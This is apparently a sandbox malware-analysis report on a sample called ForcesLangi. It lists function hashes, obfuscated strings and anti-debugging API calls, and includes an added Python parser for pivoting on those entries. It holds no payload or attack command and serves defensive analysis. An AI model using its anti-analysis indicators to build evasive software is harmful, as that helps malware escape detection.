• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: ___std_exception_copy
• String ID: 9&QN$Vxsi$Vxsi$v=z$}:$}:
• API String ID: 2659868963-2183748173
• Opcode ID: 9366cfeff818ebae47d58a834db2ef1f95c1b90d0d8f8f3467b70c00851f5418
• Instruction ID: 8855f6694e0f4b4b3687ce0f82a14031bb1d5240638f254261b294506ffd7ddf
• Opcode Fuzzy Hash: 9366cfeff818ebae47d58a834db2ef1f95c1b90d0d8f8f3467b70c00851f5418
• Instruction Fuzzy Hash: 72222776A416118FDF08CE7CC4D53DE37F2AB47324F21A619D822EB7A5C62E490ADB14

Control-flow Graph (rendered in the interactive report; blocks marked Executed / Not Executed): entry block 6ce18000-6ce18022; subcalls to 6ce12760, 6ce1a6d0, 6ce1a390, 6ce2e610 and 6ce19a20.
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: ;K;$;K;$=vhr$=vhr$M7($_-m.$_-m.$aIh
• API String ID: 0-1460946245
• Opcode ID: 668bcba1d2490bff6b3a4aebfa54b07c6ded58823126e6d6d4f7ba9ce4bcf189
• Instruction ID: ef8de2d778062ece0079cf0524095dedb9022f8211e729ea76a7326208249fe3
• Opcode Fuzzy Hash: 668bcba1d2490bff6b3a4aebfa54b07c6ded58823126e6d6d4f7ba9ce4bcf189
• Instruction Fuzzy Hash: 0EA2F43AF492458FCB14CEBCE5843DD7BF2AB47364F219516D429EBB54C63A990ACB00

Strings
Similarity
• API ID:
• String ID: I nw$Z4l,$Z4l,$]wEu$]wEu$my$9R$9R
• API String ID: 0-2567923771
• Opcode ID: e691692839b2ac8d86fbf98ae317b603520a6e97ebf7649cee079891160059c8
• Instruction ID: 0eb387f7cbbce6d65ddca9732c4cfdaf72fcbda984fa71cb73c3a922fd6ab1c2
• Opcode Fuzzy Hash: e691692839b2ac8d86fbf98ae317b603520a6e97ebf7649cee079891160059c8
• Instruction Fuzzy Hash: C882EA36A466429FCB08CE7CE5E13CD77F6AB57354F31911AB425DBB94C62E890ACB00

Strings
Similarity
• API ID:
• String ID: d6$d6$string too long
• API String ID: 0-1601816696
• Opcode ID: 2175849c19c720148461ae0a52b9a824a39e0bf1da7715acc3bd9804d7ca28c4
• Instruction ID: 0ed3e2521ef53303d1bcf52a26123a00abb299dbbb8d9bf41183bb8b1dc1fdb7
• Opcode Fuzzy Hash: 2175849c19c720148461ae0a52b9a824a39e0bf1da7715acc3bd9804d7ca28c4
• Instruction Fuzzy Hash: CDD148367486518FDF04DE7CC5D53EE37F2AB47324F31A6298862DBB95C22A590E8780
Strings
Similarity
• API ID:
• String ID: `#bO$dY?+$dY?+$ojpl$ojpl$z[MX$z[MX
• API String ID: 0-3788235473
• Opcode ID: 88d98039ddcbede46f0fbcf0d765af0e6c7bb1bfd7e8f556b66e36ec034aad20
• Instruction ID: 640f493af20b20ca235404da2836a2489d0ac94818d0e6bce4384c5ba14c3588
• Opcode Fuzzy Hash: 88d98039ddcbede46f0fbcf0d765af0e6c7bb1bfd7e8f556b66e36ec034aad20
• Instruction Fuzzy Hash: 4BC20536A599058FCF088D7CC5D53CE7BF2AB47324F346619D422DBF95C22A994B8B80
Strings
Similarity
• API ID:
• String ID: ;?"$?3.*$A$)h$|Yvm$|Yvm
• API String ID: 0-1640716877
• Opcode ID: 0330d599ecbbe9745307214433c8c685a551fe88023048d96be45f6f52854f9f
• Instruction ID: f119b406e86f40ace0f545ad4bdcf968be7aa8da489785f185bb940ff019503d
• Opcode Fuzzy Hash: 0330d599ecbbe9745307214433c8c685a551fe88023048d96be45f6f52854f9f
• Instruction Fuzzy Hash: D9F2133AB402118FCF04CE7CC9D53C9B7F2AB57358F20815AD929DB795D639898A8F81
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: .X~l$.X~l$K3T$rPz$rPz$xe2
                                                                                                                                                                                                                                              • API String ID: 0-1598945147
                                                                                                                                                                                                                                              • Opcode ID: b574ebe418ff676d1ff8b80d1618d5589b80c5314a5bea7fa6ce2143d91705ed
                                                                                                                                                                                                                                              • Instruction ID: e614f7159c6b099f64c36c9b7ca53b710ecf23fe3d492109c2d192515dfccd88
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b574ebe418ff676d1ff8b80d1618d5589b80c5314a5bea7fa6ce2143d91705ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91322436A995508FCB04CE7CD5D53EE7BF2EB47328F309219D425DBF90D22A885A8B41
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Dz5)$eG/q$l9:b$l9:b$~9Ew
                                                                                                                                                                                                                                              • API String ID: 0-2836437484
                                                                                                                                                                                                                                              • Opcode ID: e90a0ef43dcc10224373e11d71759b4aa215bb60b50c2e5f9f08130348aaece8
                                                                                                                                                                                                                                              • Instruction ID: e43d0bca6c583cec9b14880e0faa84522611ce57d89b45b149ce6bcb0b5d7a83
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e90a0ef43dcc10224373e11d71759b4aa215bb60b50c2e5f9f08130348aaece8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2B21376B496418FDF08CEBCC4957CD7BF2AB47329F21511AD425EBF94C62A880A8F41
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ^gj$^gj$pWh#$pWh#$Ob]
                                                                                                                                                                                                                                              • API String ID: 0-777673351
                                                                                                                                                                                                                                              • Opcode ID: 31dc5e815395a46f4fc7b3ea5a2d31121c317a2b0d865133074a573edf54facf
                                                                                                                                                                                                                                              • Instruction ID: b714cc12a39e182d0bb6060de1f4364732cedb10ec56c071ce9d2980c246a71c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31dc5e815395a46f4fc7b3ea5a2d31121c317a2b0d865133074a573edf54facf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29329B7AE452058FCB08CEACD5817DDBBF2AB47314F24851AE511EBB54C63E9A0ACF01
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • ocdxlonrhtobxzbmmppsktncfvbqheqvmuejpgo, xrefs: 6CDFCBA3, 6CDFCDBE
                                                                                                                                                                                                                                              • `v@, xrefs: 6CDFC6FE
                                                                                                                                                                                                                                              • lgwqcvyumsawjugnzuzdxweouksulrgoelgmoekalxmlkgeuziduyrvyqxzlwaxspsrxpywqvhwcnmucaxvevtz, xrefs: 6CDFC7B1
                                                                                                                                                                                                                                              • laqxkqcpfyvpakmoyctaiwbatatssaylldhvrbchranhq, xrefs: 6CDFCB89, 6CDFCDA4
                                                                                                                                                                                                                                              • dscxnioflcvqa, xrefs: 6CDFC7C8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: `v@$dscxnioflcvqa$laqxkqcpfyvpakmoyctaiwbatatssaylldhvrbchranhq$lgwqcvyumsawjugnzuzdxweouksulrgoelgmoekalxmlkgeuziduyrvyqxzlwaxspsrxpywqvhwcnmucaxvevtz$ocdxlonrhtobxzbmmppsktncfvbqheqvmuejpgo
                                                                                                                                                                                                                                              • API String ID: 0-967752511
                                                                                                                                                                                                                                              • Opcode ID: 91c5f46955d2d1456a3e3e6a6fcbd7cb62606f6741fb542659f3ffc90668ec6a
                                                                                                                                                                                                                                              • Instruction ID: fceba8b620521901dd565c30885600ed61ee5c14c59502ffcd6693063409f581
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91c5f46955d2d1456a3e3e6a6fcbd7cb62606f6741fb542659f3ffc90668ec6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF427BB4A002088FDB04DFACC995B9E7BF1BF46308F124198D8199F761DB75A949CF92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CE2EF1E
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6CE2EFEA
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CE2F00A
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6CE2F014
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                              • Opcode ID: 99ac77ec974ebcc05f46af676780aef1d1d3f117d9fac71f1487e759d88ac09d
                                                                                                                                                                                                                                              • Instruction ID: 13789affc0a512a71272510632ec99dbacbd0879a1d9c809e51634f76e22869d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99ac77ec974ebcc05f46af676780aef1d1d3f117d9fac71f1487e759d88ac09d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB312BB5D4522C9BDF20DFA5D989BCDBBB8BF08304F10419AE40DA7240EB795A898F54
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: CpK$O8C|$O8C|$bad array new length
• API String ID: 0-719153901
• Opcode ID: c00825cf4c9565a4e8df013217d3c71be22a21379d117b00345e7b6db40f5ace
• Instruction ID: 82fc642f2fc9db6155f58bd47040e0bebd1f99a9cfa6bc77e990624f805e3fe4
• Opcode Fuzzy Hash: c00825cf4c9565a4e8df013217d3c71be22a21379d117b00345e7b6db40f5ace
• Instruction Fuzzy Hash: F232F276B855018FCF09CE7CDA953DE37F6A747368F305629D421DBB98C12E8A0A8B40
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: )TuJ$)TuJ$_81j$_81j
• API String ID: 0-726387471
• Opcode ID: 271241e45f08aa0f5695485f0ac060cd8f9b2b15041f0f11f7de21bc8660112d
• Instruction ID: a7c377b3ed13151d36897dc145d890c4af5c4ac312d2f556cafdd027bc8b328e
• Opcode Fuzzy Hash: 271241e45f08aa0f5695485f0ac060cd8f9b2b15041f0f11f7de21bc8660112d
• Instruction Fuzzy Hash: 8612F576B482118FCF08CE7CC9943DD7BF2AB4B365F208619D425EBF94C72A881A8755
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: \x<!$\x<!$d~_D$d~_D
• API String ID: 0-1002557758
• Opcode ID: f9744634639ec766c7a2aa082bbe2e33338f95b5bdc0ac2fbde5ad8c949f672a
• Instruction ID: a30ac52d1bdaafd2e59876e738ae2b86c94afbf28bc1a59a43995332631d3719
• Opcode Fuzzy Hash: f9744634639ec766c7a2aa082bbe2e33338f95b5bdc0ac2fbde5ad8c949f672a
• Instruction Fuzzy Hash: 2AE1F776B485128FDF08CE7CC5953DE7BF29B47729F319119D511EBB90C22A8E0A8B90
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: Wjd$Wjd$B7
• API String ID: 0-2249100413
• Opcode ID: 1e82e3bcc097b533398cfaad6c4894267f3227d1694741e6de0d84cb02b92e7d
• Instruction ID: ebc648050ac7448f89ac72bbf82876351b0fc3c8b50fbaf4af98f38360e22923
• Opcode Fuzzy Hash: 1e82e3bcc097b533398cfaad6c4894267f3227d1694741e6de0d84cb02b92e7d
• Instruction Fuzzy Hash: A882C076E596048FCF04CFBCC5E57EE7BF2AB47324F209619D425DBB94C629880A8B41
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE314F4
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE314FE
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE3150B
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 9ef31c3364527a1112a0f488fc630ce552f19c234ef428a1457d5e405b64d483
• Instruction ID: df0d672925640c45cd7fac900f0f9e35b3f360d19642a0ec52e1c5d4bbabd180
• Opcode Fuzzy Hash: 9ef31c3364527a1112a0f488fc630ce552f19c234ef428a1457d5e405b64d483
• Instruction Fuzzy Hash: 1731B3B5901228ABCB21DF64D888BCCBBB8BF08314F6052DAE41DA7250E7749F858F55
APIs
• GetCurrentProcess.KERNEL32(?,?,6CE31AE1,?,00000001,?,?), ref: 6CE31B04
• TerminateProcess.KERNEL32(00000000,?,6CE31AE1,?,00000001,?,?), ref: 6CE31B0B
• ExitProcess.KERNEL32 ref: 6CE31B1D
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: b6da5ae9edf8ca12d483433be5c1af6897f99cfca23886e9c37c61862688cbc8
• Instruction ID: 2ff08be09c848220c00fb2f06f96144c310b1a50217c2e8c2903358917f9af70
• Opcode Fuzzy Hash: b6da5ae9edf8ca12d483433be5c1af6897f99cfca23886e9c37c61862688cbc8
• Instruction Fuzzy Hash: 68E04631240118EBCF222BE0C948A883B79EB01789B214028F80C86631DB39F986CB80
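The entries above (APIs with their `ref:` call sites, the Memory Dump Source block, and the Similarity fields) are what an analyst pivots on when comparing this dump with other reports. The Python below is an added example written for this page, not Joe Sandbox tooling: it parses entries in the layout shown above into records, lists the call sites of a given API, and indexes functions by Instruction Fuzzy Hash so several reports' entries can be merged to find shared functions. `SAMPLE` is constructed from three entries shown on this page (values copied; Associated lines and some hash lines dropped). Treating `$` as the String ID separator and `Name.MODULE(args), ref: ADDR` as the fixed shape of an API line are assumptions read off the report text.

```python
"""Parse Joe Sandbox IDA-plugin function entries (layout as above) into records
for pivoting: which function calls which API, which functions share an
Instruction Fuzzy Hash across reports.  Added example, not Joe Sandbox tooling.
SAMPLE is constructed from three entries shown above (values copied, Associated
and some hash lines dropped).  Assumed: '$' separates String ID tokens and
API lines have the shape 'Name.MODULE(args), ref: ADDR'."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CE314F4
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CE314FE
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CE3150B
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 9ef31c3364527a1112a0f488fc630ce552f19c234ef428a1457d5e405b64d483
• Instruction Fuzzy Hash: 1731B3B5901228ABCB21DF64D888BCCBBB8BF08314F6052DAE41DA7250E7749F858F55
APIs
• GetCurrentProcess.KERNEL32(?,?,6CE31AE1,?,00000001,?,?), ref: 6CE31B04
• TerminateProcess.KERNEL32(00000000,?,6CE31AE1,?,00000001,?,?), ref: 6CE31B0B
• ExitProcess.KERNEL32 ref: 6CE31B1D
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
Similarity
• API ID: Process$CurrentExitTerminate
• API String ID: 1703294689-0
• Opcode ID: b6da5ae9edf8ca12d483433be5c1af6897f99cfca23886e9c37c61862688cbc8
• Instruction Fuzzy Hash: 68E04631240118EBCF222BE0C948A883B79EB01789B214028F80C86631DB39F986CB80
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
Similarity
• API ID:
• String ID: etS$jr^i$jr^i
• API String ID: 0-2030300318
• Opcode ID: 9c6727ac7d0518c37cb6d9557568a6930e5ca128aed37eab55c4194cc87af286
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^• ([^:]+):\s?(.*)$")

def _new_entry():
    return {"apis": [], "fields": {}, "offset": None}

def parse_entries(text):
    """Split the report text into one record per function."""
    entries, cur, section = [], _new_entry(), None
    for raw in text.splitlines():
        line = raw.strip()  # the HTML export indents every line heavily
        if line in SECTION_HEADERS:
            # APIs/Strings open the next function once the current record
            # already carries its Memory Dump Source block.
            if line in ("APIs", "Strings") and "Source File" in cur["fields"]:
                entries.append(cur)
                cur = _new_entry()
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                name, module, args, ref = m.groups()
                cur["apis"].append({"name": name, "module": module,
                                    "args": args.split(",") if args else [],
                                    "ref": ref.upper()})
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        cur["fields"][key] = value
        if key == "Source File":
            om = re.search(r"Offset: ([0-9A-Fa-f]+)", value)
            cur["offset"] = om.group(1).upper() if om else None
    if cur["fields"] or cur["apis"]:
        entries.append(cur)
    return entries

def find_by_api(entries, api_name):
    """Call-site addresses (the 'ref:' values) of every call to api_name."""
    return [a["ref"] for e in entries for a in e["apis"] if a["name"] == api_name]

def string_tokens(entry):
    """Split the '$'-joined String ID, dropping the repeats the report shows."""
    return list(dict.fromkeys(t for t in entry["fields"].get("String ID", "").split("$") if t))

def index_by_instruction_hash(entries):
    """Instruction Fuzzy Hash -> Opcode IDs; feed in entries from several
    reports to see which functions recur between samples."""
    idx = defaultdict(list)
    for e in entries:
        h = e["fields"].get("Instruction Fuzzy Hash")
        if h:
            idx[h].append(e["fields"]["Opcode ID"])
    return dict(idx)

ENTRIES = parse_entries(SAMPLE)
```

One caveat when reading `find_by_api(ENTRIES, "IsDebuggerPresent")`: the sequence IsDebuggerPresent, SetUnhandledExceptionFilter(0), UnhandledExceptionFilter in one function, and GetCurrentProcess, TerminateProcess, ExitProcess in another, is also what the MSVC C runtime's fail-fast and exit paths look like, so a hit here is a lead to check in the disassembly at the listed `ref:` address, not by itself proof that the sample implements its own debugger check.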
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: etS$jr^i$jr^i
• API String ID: 0-2030300318
• Opcode ID: 9c6727ac7d0518c37cb6d9557568a6930e5ca128aed37eab55c4194cc87af286
• Instruction ID: d5a7b35104afba32e058db6aae0d63df4ab12cb8828f583aea301b7eaf2a6d2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c6727ac7d0518c37cb6d9557568a6930e5ca128aed37eab55c4194cc87af286
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A32F536B415018FDF08CDBCC9D57DE77F2AB47354F309629D522ABB94C62E890A8B90
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
